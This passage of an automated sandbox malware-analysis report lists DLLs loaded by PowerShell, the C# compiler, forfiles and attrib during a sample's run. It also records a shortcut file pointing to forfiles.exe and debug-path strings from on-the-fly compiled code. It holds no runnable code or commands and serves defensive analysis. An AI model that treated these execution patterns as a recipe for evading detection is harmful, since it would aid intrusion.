Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.0.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb; source: powershell.exe, 0000000A.00000002.2400175802.000001986F9EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 0000000A.00000002.2397207544.000001986F6B9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 0000000A.00000002.2397207544.000001986F6B9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbDH~ source: powershell.exe, 00000000.00000002.2179609797.0000021C771FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2180083104.0000021C772BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2478862622.000002D1B80A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2180083104.0000021C7725A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2477570747.000002D1B808E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000000.00000002.2180083104.0000021C772A4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2399330590.000001986F9C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb:I source: powershell.exe, 00000000.00000002.2179609797.0000021C771FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2179609797.0000021C771FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2477570747.000002D1B808E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.pdbhPj source: powershell.exe, 00000000.00000002.2150248824.0000021C6001D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbdb( source: powershell.exe, 00000000.00000002.2180083104.0000021C772BA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbn source: powershell.exe, 0000000A.00000002.2400175802.000001986F9EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbU source: powershell.exe, 0000000A.00000002.2399330590.000001986F979000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb" source: powershell.exe, 00000000.00000002.2179609797.0000021C771FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 0000000A.00000002.2399330590.000001986F9C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll| source: powershell.exe, 0000000F.00000002.2473830787.000002D1B7D30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbpdblib.pdb source: powershell.exe, 0000000F.00000002.2478862622.000002D1B80A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb( source: powershell.exe, 00000000.00000002.2180083104.0000021C772BA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb~ source: powershell.exe, 00000000.00000002.2180083104.0000021C772A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb1934e089 source: powershell.exe, 00000000.00000002.2179609797.0000021C7722F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2178276731.0000021C76F80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2478862622.000002D1B80A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbgz source: powershell.exe, 0000000F.00000002.2477570747.000002D1B808E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000A.00000002.2399330590.000001986F979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2477570747.000002D1B8039000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2178276731.0000021C76F80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2179609797.0000021C771FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.pdb source: powershell.exe, 00000000.00000002.2150248824.0000021C6001D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb:\Pr$ source: powershell.exe, 0000000A.00000002.2400175802.000001986F9EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbn source: powershell.exe, 00000000.00000002.2180083104.0000021C772BA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2149302857.0000021C5D032000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2399330590.000001986F9C3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2477570747.000002D1B808E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2180083104.0000021C772BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2399330590.000001986F979000.00000004.00000020.00020000.00000000.sdmp
